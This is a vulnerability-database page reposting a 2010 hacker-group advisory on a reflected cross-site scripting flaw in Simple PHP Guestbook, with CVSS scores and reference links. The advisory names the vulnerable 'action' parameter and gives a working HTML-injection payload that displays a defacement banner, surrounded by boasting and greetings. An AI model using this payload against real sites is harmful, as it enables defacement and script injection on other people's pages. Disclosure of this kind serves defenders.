Suffering From 1.0 XSS Vulnerability

2010.03.10
Credit: (R3d-D3v!L
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

[?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? [?] [~] Tybe: Suffering From XSS Vulnerability [?] [~] Vendor: www.simplephpguestbook.com [?] [?] Software : Simple PHP Guestbook [?] [-] [?] [-] author: ((R3d-D3v!L)) [?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY [?] contact: N/A [-] [?]Date: 10. Jan. 2010 [?] T!ME: 12: am GMT [?] Home: WwW.xP10.ME [-]??????????????????????{DEV!L'5 of SYST3M}?????????????????? 7h!5 !S AL3rT FROM ((R3d-D3V!L)) : [+] n07h!ng 53cur3 ...... [*] Err0r C0N50L3: http://74rG37_H057/guestbook.php?action= [/\] demo EXPLO!T [/\] demo EXPLO!T : ">><FONT SIZE="70" FACE="courier" COLOR=red><MARQUEE BEHAVIOR=SCROLL HEIGHT=25 WIDTH=300 BGColor=navy>R3d-D3v!L W@S h3R3</MARQUEE></FONT> [EV!L EXPLO!T]: = /74rG37_H057/guestbook.php?action= + demo EXPLO!T N073: REAL RED DEV!L W@S h3r3 LAMERZ [~]-----------------------------{((SHAD0W))}--------------------------------------- [~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987 [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ [~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4 [?]spechial SupP0RT: MY M!ND ;) & dookie2000ca &((OFFsec)) [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) [~]spechial FR!ND: 74M3M [~] !'M 4R48!4N 3XPL0!73R. [~]{[(D!R 4ll 0R D!E)]}; [~]--------------------------------------------------------------------------------------------- ________________________________ Keep your friends updated? even when you?re not signed in.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_5:092010>

Referencje:

http://xforce.iss.net/xforce/xfdb/55522
http://www.exploit-db.com/exploits/11077
http://secunia.com/advisories/38053
http://packetstormsecurity.org/1001-exploits/simplephpgb-xss.txt
http://osvdb.org/61614


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top